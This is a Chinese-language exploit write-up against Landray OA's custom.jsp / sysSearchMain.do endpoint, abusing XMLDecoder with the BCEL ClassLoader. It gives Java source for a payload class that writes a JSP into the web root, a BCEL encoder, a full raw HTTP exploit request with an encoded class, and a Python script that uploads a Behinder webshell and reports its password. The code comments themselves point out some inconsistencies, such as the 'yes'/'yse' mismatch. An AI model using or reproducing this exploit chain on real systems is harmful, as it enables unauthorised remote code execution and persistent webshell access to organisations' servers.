自行搭建环境:

生成Bcel代码
蓝凌默认jdk环境为jdk7，本地编译payload类等操作注意要使用jdk7：用更高版本javac编译出的class文件版本号更高，目标JVM加载时会直接报UnsupportedClassVersionError；另外示例代码用到的sun.misc.BASE64Decoder在JDK9及以后已被移除，新版JDK下也编译不过。

修改代码参数示例
| import java.io.PrintWriter; import sun.misc.BASE64Decoder;
/**
 * Sample payload class for the XMLDecoder -> BCEL ClassLoader chain.
 *
 * All of the work is in the static initialiser, so merely loading and
 * initialising the class (the XMLDecoder document calls newInstance on it)
 * is enough: it finds the web-application root by asking the context class
 * loader where {@code bsh.Interpreter} is loaded from and keeping the part of
 * that path before "WEB-INF", then writes {@code login_list.jsp} there.  The
 * Base64 constant decodes to {@code <%out.println("shelltest");%>}, i.e. a
 * JSP that only prints a marker string.
 *
 * Every exception is swallowed on purpose so nothing is reported back through
 * the deserialisation request.  Build with JDK 7: the target JVM rejects newer
 * class-file versions, and sun.misc.BASE64Decoder no longer exists in JDK 9+.
 *
 * Use only against systems you are authorised to test.
 */
public class FastJsonEchoBCEL {

    /** Base64 of the JSP body; decodes to {@code <%out.println("shelltest");%>}. */
    private static final String JSP_B64 = "PCVvdXQucHJpbnRsbigic2hlbGx0ZXN0Iik7JT4=";

    static {
        try {
            dropMarkerJsp();
        } catch (Exception ignored) {
            // Deliberately silent: a missing bsh.Interpreter, an unwritable
            // web root, ... must not surface to whoever loaded the class.
        }
    }

    public FastJsonEchoBCEL() throws Exception {
    }

    /** Local convenience only: loading the class is what triggers the work. */
    public static void main(String[] args) throws Exception {
        new FastJsonEchoBCEL();
    }

    /** Locates the web root via bsh.Interpreter's code source and writes the JSP there. */
    private static void dropMarkerJsp() throws Exception {
        ClassLoader loader = Thread.currentThread().getContextClassLoader();
        Class<?> anchor = loader.loadClass("bsh.Interpreter");
        String anchorPath = anchor.getProtectionDomain().getCodeSource().getLocation().getPath();
        String webRoot = anchorPath.split("WEB-INF")[0];
        PrintWriter out = new PrintWriter(webRoot + "login_list.jsp");
        byte[] jsp = new BASE64Decoder().decodeBuffer(JSP_B64);
        out.println(new String(jsp, "UTF-8"));
        out.close();
    }
}

生成Bcel
| import org.apache.bcel.Repository; import org.apache.bcel.classfile.JavaClass; import org.apache.bcel.classfile.Utility; import java.io.IOException;
/**
 * Prints the {@code $$BCEL$$} form of {@link FastJsonEchoBCEL} for pasting
 * into the {@code <string>} element of the XMLDecoder payload.
 *
 * Repository.lookupClass reads the already-compiled class from the classpath,
 * so build FastJsonEchoBCEL first (with JDK 7, see above).  The {@code true}
 * passed to Utility.encode gzip-compresses the bytes before escaping them,
 * which is why the emitted string starts with {@code $l$8b} (0x1f 0x8b, the
 * gzip magic).
 */
public class test {
    public static void main(String[] args) throws ClassNotFoundException, IOException {
        JavaClass payload = Repository.lookupClass(FastJsonEchoBCEL.class);
        String encoded = Utility.encode(payload.getBytes(), true);
        System.out.println("$$BCEL$$" + encoded);
    }
}

代码来源于print(“”)大佬
https://www.o2oxy.cn/3494.html
构造利用数据包
数据包
POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host: 192.168.1.88:8080
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
Origin: null
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 2779

var={"body":{"file":"/sys/search/sys_search_main/sysSearchMain.do?method=editParam"}}&fdParemNames=11&fdParameters=<java><void+class%3d"com.sun.org.apache.bcel.internal.util.ClassLoader"><void+method%3d"loadClass"><string>$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$85U$dbV$dbF$U$dd$83md$Lq3$98K$92$92$sm$gC$ASB$93$U$I46$s$5c$M$n$dc$j$daRY$I$7b$40H$aa$qS$d2$f6$7f$fa$9c$X$d1U$d6$ea$H$f4$87$fa$d6$d5327$bbjk$_$cf$e5$9c$3d$7b$ce$d9gf$fc$c7_$bf$fd$O$e0$v$7e$96q$lS$S$a6e4aJ$c6K$cc$88f6$8e$afd$bcBVF$Os2$f2$98$97$f1$g$L2$W$b1$qaYBAF$x$a6$e2X$91$d1$87U1y$T$c7$9a$e8$df$caP$b0$k$c7$86$84M$Z$3d$82$7dK$f4$dbq$ec$I$f0$ae$f0$XE$f3N$c2$9e$84$af$Z$9a$a7$b9$c9$bd$Z$86Hzp$9b$n$9a$b3$Ot$86$f6$C7$f5$d5$eaIIw6$d5$92A$96d$c1$d2Tc$5bu$b8$98_$g$a3$5e$85$bb$c27$af$ba$de$92k$99y$adbes$f9$c2$U$83$9c$3f$d3t$db$e3$96I$88$e8$89$caM$86$9e$f4$5e$e1H$3dU3$86j$963$h$9e$c3$cd$f2T$b0$ad$ea$94$J$d6$V$e2f$88Ok$c6U$90$9aA$b0$ce$5b$a8$9c$a1$ba$$$81$a2$b6$eaUD$u$n$E$8aM$Do$c7$e1$9e$ee$8c3$a4j$Yne$d6n$ec$E$8b$b9$V$dd0$Y$a4$D$5d$p$V$i$86$be$82$5b53$t$dc$d52$d9W$h$f9g$Ts5$8f$e0$ac$81j$7b0$b4nx$aav$bc$a2$da$812$q$$$J$b0aU$jM$9f$e7B$a9T$a3B$a3$o$G$F$l$e3$BCG$a3S$c27$K$be$c5$be$82$ef$a0R5Jnet$d1$a4$umG$a7VBI$81$86$D$J$ba$82C$94$rT$Up$iI8V$60$e0D$82$a9$c0$82M$82$86d$ca$d0$db$a8Q$b6$ca$8d$mai$t$9f$jY$5c$9dW$f0$3d$i$F$$$3c$866$c3$wss$df$e0$ae7z$e4$da$K$aa$b0E$e0$a7$M$e9$b5$dc$f6$e9$c1$ee$db$aa$b6$b0d$97$ccu$b7$c4$cb$5c$h$af$Y$a5$d7gc$efvW$c7$W$f9$f1$f3$a5$cd$89$97T$fap$r$v$f9$c6$60$U$fc$803$aa$c6$d6$e6$fc$c8$L$b1$d1$7b$F$3f$e2T$c1OB$ab$ae$h$f8$f5$B$ab$pyS$3a$d25$af$ce$b4Yqt$f5$80$8a$a4U$jG7$bd$abywz$b0$d0$88$a2$d2$a6$ca$ba$97$b3H$ee3$_8$5d$FK$N$o$ed$af$83$dfr$895$a1$O$86$84A$83$c0$c2$f0$u$jr$f8C$8er$7b$83$89$92$a6$88$d6$i$cb$a3$c4$u$dd9$abv$9b$k$5e$c5$e3$ea$94$Y$f7$deg$g1D6$f0$df$I$S$r$c8$96NrpZ$Z$ee$fd$83$f5$c6K$7c$7d$ff$e6ch$n$s$f1J$5c$96$e4$8a$c7$d4$bd$cc$d6$bax$S$94$dbs$3al$o$ab$e0$d6$d6$X$e2$fa$de$c6$5c$db$e0T$ca$c7a$c2$85$3e$V$cd$aam$eb$s$95v$e4$7f$b4$ae$3b$f7$e2$8d$f1$ac$ab$ab$9c$K$5b$ba$7d$7d$e3$b3$d5$c3CQ$d9$9e$d0$a0$b2t$b
b$d2$7b$d9p$G$vx$87$M$S$t$a6$Z$96$ab$e3$B$bd$fc$f7$n$3e$R0$f1$W$d0$fca$f0$e7$c0$e8$L$c4$86$ce$c1$3e$d0$a0$J$9fP$x$fe$u$c8$88$u$9a$f1$v$8d$94$g$I$8f$f0$Z$f5$8f$e9$X$r$cb$A$SHc$f0$92$ea9$f5$C$95$b8$40S$f1$i$91$9dF$ba$E$e24$ba$a1K$60$IO$ea$e8$e2$Y$a6$c8$98$a0c$R$da$ae$99$3c$95_$R$f5$RK6$fb$90$96$87$7c$c4$7d$q$7c$c8$3eZ$K$XP$8a$Xh$a5$cd$da$9e$q$db$7dtD$c6$7dt$s$93$d4$f8$e8$3aG$f7J2$b5z$81$k$C$f4NF$_$d0W$ec$8f$8e$f8$e8O$de9$c7$dd$c9$d8p$7f$cc$c7$bda$l$l$fd$82$e8$f2$87$m$s$8d$5e$b9$B$d2HD$3d$8a$Wj$db$u$dav$dcA$H$a6$d1$89Y$q$b1$80$$$U$d1$8d$7d$a4$I$dfK$xzPF$7f$90$d9$M$c5$ac$60$H$p$b4$g$b4j$R$Z$8c$R$f34e$f99$c6I$87Y$c2$3d$r$5b$84x$eeb$C_P$eeE$d2$e5$Z$d9b$q$a2$d0$a5$e9O$iJxA$w$e0$cb$40$c4$c9$bf$B$92$e6un$cc$H$A$A</string><void+method%3d"newInstance"></void></void></void></java>
发送数据包

验证结果

Script

| import requests import sys
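def GetShell(urllist, timeout=15):
    """Send the XMLDecoder/BCEL payload to a Landray OA host and report the result.

    urllist -- base URL of the target, e.g. http://host:8080 (no trailing path).
    timeout -- seconds allowed for each HTTP call.  The original listing passed
               no timeout, so a host that accepted the connection but never
               answered hung the script; a failed or timed-out request is now
               reported instead of raising.

    Nothing is returned; the outcome is printed.  Run this only against systems
    you are authorised to test.
    """
    url = urllist + "/sys/ui/extend/varkind/custom.jsp"
    # Headers as in the captured request.  "application/xhtml xml" is kept as
    # written (presumably "xhtml+xml" with the '+' lost somewhere in transit);
    # the target does not act on it.
    headers = {
        "Accept": "text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language": "zh-cn",
        "Accept-Encoding": "gzip, deflate",
        "Origin": "null",
        "Connection": "close",
        "Upgrade-Insecure-Requests": "1",
        "Content-Type": "application/x-www-form-urlencoded",
    }
    # Class bytes in BCEL's $$BCEL$$ encoding ($l$8b = gzip magic).  This is a
    # different compiled class from the FastJsonEchoBCEL sample above: that one
    # writes login_list.jsp, whereas the check below looks for login_123.jsp,
    # so this blob presumably writes the latter.  It was transcribed from a
    # hard-wrapped listing as three adjacent literals -- regenerate it with the
    # BCEL encoder from your own payload class rather than trusting this copy.
    bcel_class = (
        "$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$85V$dbv$db$d6$R$dd$b0HS$a2$e1$d8$96$z$d9JR$e7$d6$q$b2cY$bc$84$b1e$vvMJ$84$40$C$94x$c5$c5m$5d$Q$84H$88$m$80$Q$80H$aa$fd$9f$3e$e7$85$ee$aa$d6$ea$H$f4$87$fa$96$95$Bh$d9$96$ca6$d2$e2$c19s$f6$d9gf$P1$c3$7f$ff$f2$cf$7f$B$c8$e2oI$7c$86$ed$Ev$92$b8$82$ed$q$7e$c4$f3px$b1$88$3f$q$f1$S$f9$q$K$d8Mb$P$c5$q8$ec$t$c1$a3$94$409$B$n$89$eb$d8$5e$84$98$c4$3dT$c2$c5$c1$o$O$c3g5$J$W$b5E$d4$Th$q$b1$g$b27$c3gk$RR$I$96$c3$7d$r$i$d4$E$5e$r$f0G$GWwL$db$f4$9f3XX$7f$d0b$Q$x8$j$83$c1$N$c1$b4$8dJ0h$h$c3$86$d6$b6$c8$b2$y8$baf$b5$b4$a1$Z$ae$df$gc$7e$cf$f4$c2$bd$a2$e6$f9$r$cf$b1$f7$f4$9e$93$_$ec$J$db$M$92$7bc$ddp$7d$d3$b1$J$R$hh$a6$cd$60u$fd$95p$ac$9dh$9b$96fw7$eb$fe$d0$b4$bb$db$d1$b5$da$b0K$b0$dbs$b6$Z$y$ee$e8$d6$b9$93$baE$b0$5b$l$a0$K$96$e6y$E$8a$b9$9a$df$L$5d$99C$c0$ba4$f1$a5$a1$e9$h$c3$M$83$95$Z$c6t6$P$df$db$J$W$f7z$86e1Ht$M$9dT$Y2$b8$tx$81$bd90$3d$7d3$ff$b2$be$f7$c3$f7$bb$b3$9d$90s$G$9a$dd$c1$e0z$dd$d7$f4$be$a8$b9$912$q$$$JPw$82$a1n$U$cdP$a9$95$cb$K$3d$O$7d$60$f19$be$60p$f3$f2f$C$7fb$f1g$bcf$f1$Xh$94$8d$b6$d7$7b$cc$db$e4$a5$3b4hL$a0$cdBG$t$B$83$c5$R$ba$J$f4X$988N$a0$cf$c2$c2$m$B$9b$85$D$97$E$9d$T$v$83$bb$975$ca$H$a6$V$F$9c$90$f6$f2$h$7c$a5$c8$e2$t$MYx$f0$v4$cb$e9$9a$f6$ebt$s$fb$f8$d8sY$EpC$bfO$98$F$YR$f3i$a9$99$l$vR$c7$e29$cb$d7$b9$adIg7ej$83bF$a9$e7$d2$j$ce$f2$E$d3$f1$a2$b5$dc$N$94l$v$a7$ef$d7N$e6$da$ec$caH$95$c4$a0l$f2$d6$e1$f1$c8$e2$a5$8a$a7$c8$95S$be$d8$ec$aar$_$a5J$"
        "b9$be$3e$c9$ef$b6$b9$e2$a9$9e$g$9f$uR$cd$d2m$bfU$de$9b$e1$g$dcVO$e5Z$T$9e$T$5d$p$5bI$eb4$_$d3$fc$m$9b$ku$a4$92$a7Ib$b7$9a$Z$f7$f4$ac$d8U$t$3d$d3$90k$W_$f4$3b$8ai$3d$d1$H$adTG$$$F$fc$fe$ec$9c0$a8Y$ea$c0$K$d4$e6$8c$bb$cc$f1$9eX$Y$9b$c2$60l$b5$H$9d$94V$e8$3f9$92S$91$9f$9a$a4t$cb$fb$rK$97$5b$96$9e$ad$Gj$a6$95jH$ad$94$c6m$f5$cb$85$7e$a0$ca$c5$b4$o$8dO$cb$85R$b5$91$ae4y$b3$ef$g$e9JJ$P$f9$t$f9$e1a$bd$d4$ab$i$ef$8d$w$928R$g$caX$94$f8$U$7dF$fc$b1wR$Od$cem$M$NWW$f2$e2i$a9$d2$96$aa$e9C$beV$R$hje$b7b$f6$b3$3f$c9$dcK$b9d$v$83V$ae$9d$c9$f5$cb$e6$d6$a9J$fej$d2V$m$d8$f9t$a7$a8$f6$da$fb$z$8b$eeN$f3$e6xXn$f8$bb$9a$9cwT$99$ef$w$a7$e9$f3y$e4s$5d$ca$9dv$b8b$a0d$9a$O$df$_$W$9b$T$de$3d$c8$88$81$s$e5$dcN$a1$3b$R$b8$9c$d5$99$e4$h$aaT$99$a8rMPe$abAZ$j$979$_$3a_$b5$ad$94$w$8bN$b9$3e2$ab$cdV$p$8c$f3$m$T$9di$95$f7k$8e$s$8b3$dc$y$H$84$cb$d9$c4s1$9ff$d7$N$ed$94$b7$40$e5$b68$ba$bb$d7$$$f4HC$bd$abg$5b$810H$bb$3a$f9T$ed$X$h$b5$86$92$aa$d1$fd$ed$cc$ec$5c$983$r$b3$d5W$9b$a5$b4$3aP$c9$d6$9b$84$da$93$k$va$d0$b1$3aE$d2$e9$ed$j$82$j$cdE$e2$tm$fatg$3fh$PZ$d9$P5$m$3f$c2$9c$92$7e$a2$a3sE$9b$be$L$tm$bbf$Z$fbU$faNQ$eem$f1G$aah$f3$L$E$bd$d3$97$df1$W$p$8c$a9$c84$h$c5$8d$a7$e1$L4aq$8a$T$W$7f$NK$c0$ed$f7$f0wu$f3$C$c9A$fb$d8$d0$fd$L$a6Fohh$jzA$f5$6084l$ff$7c$7dg$fd$81p$ZE$Vk$a5k$f8$F$87$aa$c8$d8$8f$8a$a6$e0h$91$a7k$X$e0$ll$85g$e6n0X$b2h$SY$Y$7c$bd$3e$a7$a6$cf$a9$d07$$$99$uh$f2$e8p$e8$f8$U$Y$85$bb$eb$cc$9a$c4$97$e7$fex$G$Ff$fa$93$cd$cb$Y$o$bb$ff$ff$R$qJ$U$z$V$e8$a8$I3$f8$f4$bfX$df$ef$S$df$bd$ff$b5$c7$e0$g1$85$cd$efmJ$ceyl$c3$dfl$d6$c2N$c7$7e$b8$a6$g$gF$V5$a3$8b$89x$d7$8e$e2$9ek$99$94$cao$e7$J7$b7$D$5e$d5$5c$d7$b0$v$b5$h$bf$a1$f5$85r$k$b6N$df9$efP$x$f3$8e$b6$de5$b2$7cpt$Ufvu$aeSyj$g$eb$af$f2$f3$Z$SQ$7b$b5H$9c$b8n9$9e$81$_$e8$H$cdg$I$ff$W$c0$84$z$8e$d6_F$bfy$Y$fa$H$e2$P$df$80$f9$99$sW$f0$V$8d$e1$ef$l2$o$86$ab$f8$3d$cd$d8$Z$I_$e3$hz$7eK$9f$YY$eec$J$ebx$f0$96$ea$J$3dC$d4$d2$Z$ae$uo$b0$m$5d$a6$5b$c2$o$cd$de$d3$z$e1$n$be$bb$40$b7$88G$e4$Z$T$d2Q$x$8b$d3$e5$40$ef$l$88M$R_$be$3aE$a2$fcp$8a$c5$v$96$a6HNqM8$D$ab$9c$e1$3a$5d$f6"
        "$d1w$cb7$a6$b8$b9$90$99$e2$d6$f22$NS$dc$7e$83$3b$e2$f2J$e5$M$ab$E$b8$fb$yv$86$7b$caZlc$8a$b5$e5$8f$df$e0$93g$f1Gk$f1$v$3e$7d4$c5$ef$fe$8eX$f9$e7$c8$t$9d$9a$f7$7d$d2$u$f4$fa1$ae$d1$f8$Ry$7b$D$l$e3$svp$L$_$b0$8c$7d$dc$86$82$3bx$8d$V$c2$df$a5$T$ab$e8b$z$8a$ec9$f9$ccB$c2$G$9d$G$9d$e2$b1$89$U1$efP$94idH$87$X$84$cb$92m$81x$3e$c1$f7$c8Q$ec$K$e9$f2$D$d9$e2$qb$a8$cb$95$ff$e0$u$81$a7$a4$C$b6$o$R$9f$fd$KP$d5$f3$3c$a3$K$A$A"
    )
    # `var` makes custom.jsp include sysSearchMain.do?method=editParam, and
    # `fdParameters` is the XMLDecoder document that endpoint parses: it has the
    # JDK-internal BCEL ClassLoader load the encoded class and instantiate it,
    # which runs the class's static initialiser on the server.
    data = {
        "var": '{"body":{"file":"/sys/search/sys_search_main/sysSearchMain.do?method=editParam"}}',
        "fdParemNames": "11",
        "fdParameters": (
            '<java><void class="com.sun.org.apache.bcel.internal.util.ClassLoader">'
            '<void method="loadClass"><string>' + bcel_class + '</string>'
            '<void method="newInstance"></void></void></void></java>\r\n'
        ),
    }
    listshell = urllist + "/login_123.jsp"
    try:
        requests.post(url, headers=headers, data=data, timeout=timeout)
        listshellr = requests.get(url=listshell, timeout=timeout)
    except requests.RequestException as exc:
        print("请求失败: " + str(exc) + " --请手动验证")
        return
    # NOTE(review): the marker looked for is "yes" but the printed Behinder
    # password is "yse"; one of the two is probably a typo -- confirm against
    # the payload class the blob was generated from.
    if listshellr.status_code == 200 and "yes" in listshellr.text:
        print("成功GetShellshell地址为:" + urllist + "/login_123.jsp ---->冰蝎3密码为:yse")
    else:
        print("webshell不存在利用失败--请手动验证")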
def main():
    """Command-line entry point: ``python3 lgo.py http://target[:port]``.

    Exactly one argument (the target base URL) is expected; anything else
    prints the usage line.  Run only against systems you are authorised to test.
    """
    if len(sys.argv) != 2:
        print("python3 lgo.py http://xx.xx.xx.xx")
        return
    GetShell(sys.argv[1])


if __name__ == '__main__':
    main()